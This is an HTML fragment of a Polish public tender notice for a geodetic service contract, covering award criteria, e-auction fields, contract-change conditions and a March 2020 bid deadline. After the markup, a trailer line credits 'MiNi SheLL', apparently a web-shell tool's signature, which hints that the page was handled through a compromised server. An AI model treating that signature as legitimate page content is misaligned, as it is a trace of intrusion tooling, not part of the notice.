collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>okres gwarancji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zmiana umowy może nastąpić, po ewentualnej zmianie przepisu dotyczącego wysokości stawki podatku od towarów i usług VAT, co skutkować będzie zmianą kwoty netto i naliczonych kwot podatku VAT, do dostaw i usług wykonywanych po dniu, w którym przepisy zaczną obowiązywać. Wynagrodzenie brutto wynikające z umowy z Wykonawcą pozostanie bez zmian.4 Zamawiający dopuszcza zmianę terminu wykonania przedmiotu umowy zawartego w umowie w przypadku wystąpienia siły wyższej – tj. zdarzenia bądź połączenia zdarzeń obiektywnie niezależnych od Wykonawcy lub Zamawiającego, które zasadniczo i istotnie utrudniają wykonanie części lub całości zobowiązań wynikających z umowy, których Wykonawca lub Zamawiający nie mogli przewidzieć i którym nie mogli zapobiec, ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych (np. wojny, pożary, powodzie, embarga przewozowe, strajki oraz oficjalne decyzje organów władzy państwowej , huragany, brak dostępu do bazy danych itp.). Opóźnienie musi być udokumentowane stosownymi protokołami podpisanymi przez Wykonawcę i Zamawiającego oraz zaakceptowane przez Zamawiającego. W przypadku wystąpienia opóźnień strony ustalą nowe terminy, z tym, że maksymalny okres przesunięcia terminu zakończenia realizacji przedmiotu umowy równy będzie okresowi przerwy lub przestoju.5. Zamawiający dopuszcza zmianę osoby kierownika na osobę o kwalifikacjach odpowiadających kwalifikacjom opisanym w art. 43 ust. 1 ustawy prawo geodezyjne i kartograficzne.6. Warunkiem dokonania zmian jest złożenie wniosku przez stronę inicjującą zmianę, zawierającego:a) opis propozycji zmiany,b) uzasadnienie zmiany,c) opis wpływu zmiany na termin wykonania umowy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-03-10</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com